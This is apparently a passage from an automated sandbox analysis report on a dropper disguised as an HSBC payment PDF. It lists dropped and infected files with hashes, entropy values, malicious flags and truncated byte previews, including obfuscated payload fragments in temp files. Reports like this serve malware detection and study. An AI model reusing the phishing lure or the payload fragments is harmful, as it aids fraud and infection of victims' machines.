                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.....................................m.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1512448
                                                                                                                                                  Entropy (8bit):4.89787576946359
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:tQVTZu0Jd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:GVTZusLNiXicJFFRGNzj3
                                                                                                                                                  MD5:DB9DAC65C2D1052E2BAC162684DBD6A4
                                                                                                                                                  SHA1:7E502F6157C6172FB5CB82E646FD14030CF57C5F
                                                                                                                                                  SHA-256:218FA228238EF44002F8F720B3372C91687798870390A04C13FAF83C9DBC75E4
                                                                                                                                                  SHA-512:B9D1345E5BED23B2B90AC71A3CB0D801427DE1DD6AE0D1D3919A47CE0928A7B243B4C9062755C39328B3181DBE95E3916B47D8E82D8446240D4B6DBC4784C4DF
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`".....G].... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1344000
                                                                                                                                                  Entropy (8bit):6.7983879700794505
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:8C1vpgXcZ/zr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8C1vpIc9rLNiXicJFFRGNzj3
                                                                                                                                                  MD5:3563E4DA1C2DBACF554C51949192F618
                                                                                                                                                  SHA1:2DF42269B4608FC3F8206210A25880685C580254
                                                                                                                                                  SHA-256:B5B7D6E5D70970F688F97B2BAA3E9FB0EC6C77F90BAE5A6BBB7AF700597DDC7F
                                                                                                                                                  SHA-512:35C5D10A8072BBF8CD1A2D618304BF7DCB135EE3A7CA6175DBF6D036C9FCFB72BC36BF3A4864FA8A6FCB40F4EB987A2D3F78D004C77502325EE77A9A64E9E909
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@....................................7..... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1355776
                                                                                                                                                  Entropy (8bit):4.651130323907116
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:FSv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:QLNiXicJFFRGNzj3
                                                                                                                                                  MD5:D27B2B2743008EEDADEBCF92D9216436
                                                                                                                                                  SHA1:87A807BC6620F53E118C5760F5F8EC9B36B116DC
                                                                                                                                                  SHA-256:ACE36A6490565BC50020EF1C611D92DEC38D13D21DEE5C1C87EB60A527C990F0
                                                                                                                                                  SHA-512:C50E5ECCEBCB635EF9BB34B66B739F58285DF6D7579B54FD5D8C968386456A30AF79F6DF85E1D1C8678B1CA7B4E824CC1208D8DD8C921E03FB93D1AB4FE689CE
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.......................................... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...`...p......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1564160
                                                                                                                                                  Entropy (8bit):5.002300604770758
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:4WDntIfGpt/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zZIeTLNiXicJFFRGNzj3
                                                                                                                                                  MD5:0E1104F07AF738BDC80962244A071D2F
                                                                                                                                                  SHA1:24340778B0C0AAB4363A83444C0B6F74ADC81B30
                                                                                                                                                  SHA-256:753AF73A4B28276B28FA2943BDE74D5B55FBE21B44246EB526ED1F0348CFB690
                                                                                                                                                  SHA-512:57643FD46F392DD46173C44684A2371E5E1950B7E2D901116E2C7E770123E26E4BD27A05A84FCDC3E816613CEF70D0FED63A34C72F3CB1179A8644D8CCF49FD3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@..............................#.....ph.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...`...........>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1340928
                                                                                                                                                  Entropy (8bit):4.611595878185602
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:dIhHiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:oz/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:40D30B8AE9E2DA6D3553001F90EF8B1D
                                                                                                                                                  SHA1:847CEA4D8B47A202C3454281744EE95AA7CDB03F
                                                                                                                                                  SHA-256:952A2A62EB35F0F9131382B7760F6BF5673AE2B63A5C57E39F7379F72D84687E
                                                                                                                                                  SHA-512:0744E57F399A51630A2567C45A1EE862A4A45575BADB9F800317A3AC4AF513C4567488F8BE7E0C36E51C8B4D57751847CDCA74ABE705DF23E602C7CF2F202424
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...`...0......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1687552
                                                                                                                                                  Entropy (8bit):5.015372375315118
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:P8oRswt2ioQ3J+R+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:P8oRxoF+LNiXicJFFRGNzj3
                                                                                                                                                  MD5:48A604651F551E7A4547D1F422C7955A
                                                                                                                                                  SHA1:95F12DDB662891F5076D011463C9B03DA727D26F
                                                                                                                                                  SHA-256:3BC895C9D57DEEED663A591DD50EEE25F6A2D4CE1CAEDB8A4CE52043AB18088C
                                                                                                                                                  SHA-512:5E91D9F67D21D2E7C6536707B2A2A8E6767478D2C2CC63B8808EAC243C027FE7D0CE94D2022097476374C92965B71432E909741775DE238B789DC9BDCC5E4247
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@..............................%........... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...`........... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1497600
                                                                                                                                                  Entropy (8bit):4.7911139359160755
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:Cf8HQlTMxHwJ07w+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CkHQlawJ09LNiXicJFFRGNzj3
                                                                                                                                                  MD5:03751B15C62196B5EBA12EC2127EFB85
                                                                                                                                                  SHA1:26CD9E16656720F74CCC8CADAA6304A4F54EF4BE
                                                                                                                                                  SHA-256:C49FB2D77916BD068A411DBA510C8D75CC47FA91E7703E8DA0013F0A147B3A93
                                                                                                                                                  SHA-512:CB256DDCA2DC4B0C041AE38E900F0BF65074ED76F7373D26C317C1107FB202BF9D63DE49FD14C159A815A4F6A9E686363488B8CCB3E42C25E9D6A63840FFABC4
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@..............................!.....nQ.... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...`...........:..............@...................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Windows Media Player\wmpnetwk.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1534464
                                                                                                                                                  Entropy (8bit):7.117174764915904
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:qSEmYD6gjGPG45QVDkfX4lyTy9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:q5mYD6g2GWQVQfeyTaLNiXicJFFRGNzb
                                                                                                                                                  MD5:2AF329B1E049D29D9351F6429670704F
                                                                                                                                                  SHA1:77CEA480ECFCA581F4F89B2CFA0127FD19DA18E3
                                                                                                                                                  SHA-256:DCEE74DB8F02F850DCE9742A2971D821F3391E424CC18E13736B593C8613B18B
                                                                                                                                                  SHA-512:1806AADC3160C05B324C22526E3DB0FDA763EA0E3732B1E9DB47F3939898B03E886BEC6350044A4536F7C1435E83A0BE0246D971C465082ECCDFF8AA56F374F2
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@.....................................j.... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Grinnellia

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):143378
                                                                                                                                                  Entropy (8bit):2.992349993841804
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:AIXLr4j+F05BmsDo6Mi0Fl7dSA6+8DdfD9CGcuY9Ihyvuu3srWVjjGqnBaAJZdjR:H30jU7axIGcuY9Ihyvuu3srWVeqnBaA
                                                                                                                                                  MD5:FA1714936B286E57B46653F77235A3A8
                                                                                                                                                  SHA1:854732BB09F435AD59281A4E9DAFA7D0EC160FF1
                                                                                                                                                  SHA-256:E1C3EF3E7D679C3F677189D3784A2C2AAC65D355D60EEBE93AF03B593B3A31C6
                                                                                                                                                  SHA-512:F6EF27ABDAC119DEC399B4054826A4B6B2CDBAB40A71DDF5E5CFB0F4A82B27D2ADFBB473612F8FE2C331A539B42021FF17BCF0AC67C62C4A88E0277FC16F1E6E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\aut7315.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65908
                                                                                                                                                  Entropy (8bit):7.899556468920535
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:yHspIawXuPvaiTfvYkZ2q2eWIs15PqHtORBdW4poejitrPXu:yHsiRERTHJZr2eWI0PGOtW4pTjUr/u
                                                                                                                                                  MD5:2291D7D715A21902A07FCDE81A8EC59D
                                                                                                                                                  SHA1:57B09D827A7523466AC332AD76965436A35C4E3F
                                                                                                                                                  SHA-256:CBCF58B1C2C51062CDD2D50549A8FF729008C4A6751FB367C6AC1C06A88EA710
                                                                                                                                                  SHA-512:9B3299F4D940E995D10E5A630AD01DF946979005CF5BDA519B8107D1B0465067790B56201A4E3659F8D5D09279B5A3A5A519DD99E3D0B1371414D3DC0AF1888C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:EA06..n.........R..4}.&.O.U.5J.&qY..*.....X.M.4.@..i.... .X.U.Uz.....z.P..1^.O-.y..c;..-..w=..r+e.Y!.O..H...y.M.2{.~.L..,f3..Rn..ec.x.x..5.....E..O.U(UZ...*..M^.t..?4..B+R.....f.L...,.kZzl.M.......hTZ......i.8.f+.....5x.P.c.:8....P. !.....o.U. ...X.@...e.......i...&aW..+`.....I.^'t.\..X.....8.aI.,&Up...6....Yd.s*.Vh`..J.F..@...$.k...0P...K..7Q..b.T..d.z}c......X...f.5Op....-uf.J........lS.UJmJ.A.,...X..........Z....... .......\.,$..........p..p.XL@..]B.Y......>....*.9...+.P......G.Qot.Ew.V.Rg..eb.H..htj...6..y.:MR.:..i....!G.B...E<.(.N...N.[...u*.v.a.M.7jE^.T.[....6.B..m6J...?.h/..=..8...UZ.~MJ.`9...f.V.B...-..<.T.t+........zm..c.I.U....R..%..d.d._mr..&q].V/.K..4...j.SW....."...Uj.;e..2.+).Y7.I._...?R..*6......U*....7X..*.....A.G,t....T.Rb..}b.B..(s....2..&.@."....!.]Rv.XO...}..........U.bh..2m_..#`.TP....(tj...y....{.2.I.Vl...R...]...#H..| .Ef.[.Z.R.%Vuf.Viv(.&.-.......1e.^p..N.b.......v.M.*/...4.!;z.....B ..X..!=.M[Q\..i....Q...(.+(..*.U*...>e...

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\aut7355.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):14596
                                                                                                                                                  Entropy (8bit):7.635598712147525
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:ITYznwMNeAOPPYLDfvWME/eTk5mUOY/l3FDKf3isCLbh:IAwJV8DfvWkOL93FDKasCXh
                                                                                                                                                  MD5:B48A4597F4E86165FCB59399257909C1
                                                                                                                                                  SHA1:4A13D4102E4B18D8D24AA8993F4A7745E01B2A63
                                                                                                                                                  SHA-256:6BC3DF8C955DE1276BB11455D5DAD6FAED98192F48139D111800E34598522947
                                                                                                                                                  SHA-512:9C14C8125DE5B54C00339A83736BA012B7380BE0DA47038C9316CB8C8B07297D12665F1A2F69BDB69AE105B6C54E24CAFDBA2B2A52C3560AA040C7513C9F791B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\gobioid

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):93696
                                                                                                                                                  Entropy (8bit):6.868568315377798
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:EGzcAcNLGdG+R7vzDChKkudDX3rf2/p4aEGPxbUbb0SLczhVPJ/rFh:7cA0LGdBfIKkupr6XEkxqb0lph
                                                                                                                                                  MD5:FDAD0D8DA0849142021EFD83808D474A
                                                                                                                                                  SHA1:D1B94552E5F9E89ADE83D03AFAE3CDF42FCF4307
                                                                                                                                                  SHA-256:1B08749B183A40AA06DE4549D1E97758BFB59BFAD279351356E3C9A6F27F5FC5
                                                                                                                                                  SHA-512:3539D9FE32EB79B3D84315D3B8059AE4E001ABB86887E53363FC273EE8AD139A4945FE13B40F62345B778FD75BD17320212758F424CA8DCE4E8D5B519FA354A0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:u..XVBURGFQG..YO.WITVI8Y.XUBURCFQGL6YOHWITVI8YOXUBURCFQGL6YO.WITXV.WO.\.t.B..f.^0<h';;1;Y4o;4,;=7f3"lD,!h>'t..ky"71'{_NLuGL6YOHW..VItXLX.x .CFQGL6YO.WKU]HhYO<TBUZCFQGL6W.IWItVI8.NXUB.RCfQGL4YOLWITVI8YKXUBURCFQ.M6YMHWITVI:Y..UBERCVQGL6IOHGITVI8Y_XUBURCFQGL6..IW.TVI8.NX.GURCFQGL6YOHWITVI8YO.TBYRCFQGL6YOHWITVI8YOXUBURCFQGL6YOHWITVI8YOXUBURCFQGL6YoHWATVI8YOXUBURKfQG.6YOHWITVI8Ya,0:!RCFE%M6YoHWI0WI8[OXUBURCFQGL6YOhWI4x;K+,XUB.WCFQ.M6YIHWI2WI8YOXUBURCFQG.6Y.f%,89*8YCXUBU.BFQEL6Y#IWITVI8YOXUBUR.FQ.L6YOHWITVI8YOXUB..BFQGL6.OHWKTSI .OX..UR@FQG.6YI(.IT.I8YOXUBURCFQGL6YOHWITVI8YOXUBURCFQGL6YOHWIT.4.V..+&..FQGL6YNJTMR^A8YOXUBUR=FQG.6YO.WITaI8YjXUB8RCFuGL6'OHW7TVI\YOX'BUR"FQG.6YO'WIT8I8Y1XUBKPkYQGF..OJ.iTVC8s.+tBUX.GQGHE{OH].VVI<*lXUH.QCFU4h6YE.SITR:.YOR.GURGl.GO.OIHWR;nI8SO[.WSRC]{aL4qvHWCT|o8Z.MSBUIidQE.?YOL}.'KI8_g.UB_&JFQE.<YOL}WV~.8YErw<FRCBzGf.'[HWM.Vc.'ZXUF~Rid/QL6]dH}k*AI8]dX.D.0C4.KLFZ )WIR~.8YEp.BUTClkG28YOLU&.VI2.e.Uj.RC@Qo.6YIH..TVO8q.XUDUz.FQAL.cO`.ITPI..OXSB..C8bGL2uH6dITRb.'~XUF.T;F

                                                                                                                                                  C:\Users\user\AppData\Roaming\9624e934681120d9.bin

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):12320
                                                                                                                                                  Entropy (8bit):7.984393411503989
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:HnzpEC4LrCCmRrW0BAtRMz2hGbL/XPz5SH3Kcy2pU:Hnz1MrCCmR3JCWXV03KV8U
                                                                                                                                                  MD5:8E5334A950BB89D1A8BCFBC032AF6D90
                                                                                                                                                  SHA1:3D224AEFE036033EE2E48DE2E940FFC609421125
                                                                                                                                                  SHA-256:4DD079089A420A5CE03342C0F980E8648E4EFA6D2E39F000C53DC9C4855A627C
                                                                                                                                                  SHA-512:0CAE7FC193F4EDF4735241A40E38F6159468DAC1D01248C08FFD3A8F3DAF9A86ABB9F2AA3EEE152B11A1CA0547FA2C873E791160671978FE3F8639211EE1CF14
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:... ..\....}..J.i...+q.{tLjNT. .M.*......g..A...V.......$..Pw.... /4=U....P..A.z.d.~}.."k.8.%.3....-...EMA..ggVap%..f. ....V...k.S.d.B.~.i...H=b.x."...H..m......S.....t&5..4y...#..]8a&.z.L....CXj..^....;...../...,...1.w#..jy.....Ql..J..q$...cl&.}6.....=..........|0..u..D...R{.uq.Q".......$y.....^>.^....~t*....q......f.c....Z..5~=...#n......{7.=.@.\l...D...b.)Q..@......#......C...XQ..U.A.P........}...h.&,\.........N5Cb.@a...j.!..<}....nXb......N..g.N.....|..k.$..4{...|....h....J..SF.QR...&..2.....q.zlL9.r.O$.._...ICsX.j.b.._.Y...c...2<....U.t.a.C..(T.....6n.z*..{.D`F.f})e..d.....zb.s.Z../Cv......L..tt.c\....45.. E_...u`..*... 2...6.U.P..E.VmK...M..n.....(>N.3........{>.Y.....Y..SZ..b.....c...o.b..^/....F..N...*.y.3i......ck...y..C.i..*.^......|.T...|5.,..x.i..Y..L.....P..>...$r.w....d.;...PEB\..+.7~........9....r..5...*l/yM....#.WB......_....f.....M.tox...1.w.Wu.:".%;.L@......s.!.3....o.X.........>..N&[.m...O6..y@.B6.O...n,..5

                                                                                                                                                  C:\Windows\DtcInstall.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):2313
                                                                                                                                                  Entropy (8bit):5.131457057494496
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786n:Z070s0Y0q0mF7Dm5Q
                                                                                                                                                  MD5:2D8B4A253633CBA98E19E27B060A4D83
                                                                                                                                                  SHA1:A8F21CACD324CE3356204409E115BC7F11A7610A
                                                                                                                                                  SHA-256:012B58ADCBE65083D939D330B3163B77137AF4401CC7C97A514ECB9BDC7396BE
                                                                                                                                                  SHA-512:5BE13A1EA0B9619E2DB6B71B8B4043CCE86F943392C7C585193DBA15283ED41CB16BE74C7633D8C2266EBFE7AA43EEFBC16E104B73F8F73C2EFCA1989956E384
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

                                                                                                                                                  C:\Windows\Logs\WindowsBackup\WBEngine.0.etl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\wbengine.exe
                                                                                                                                                  File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "^^\020\"
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):30720
                                                                                                                                                  Entropy (8bit):1.1896887515235615
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:4z7/5M+TmNcNxPBXPKGVEo/PPoPAPePqFIeansYsSsfmUnV8:2/5M5clCGVEo5ddnm
                                                                                                                                                  MD5:A91949646E07C95FC4295FECDDB62C3B
                                                                                                                                                  SHA1:588532FD0203B6E573667E46B56F74199F224D86
                                                                                                                                                  SHA-256:820D86F906C06738F4E3070657C08F1C36BC8D1EA548962D8000283066FF19A7
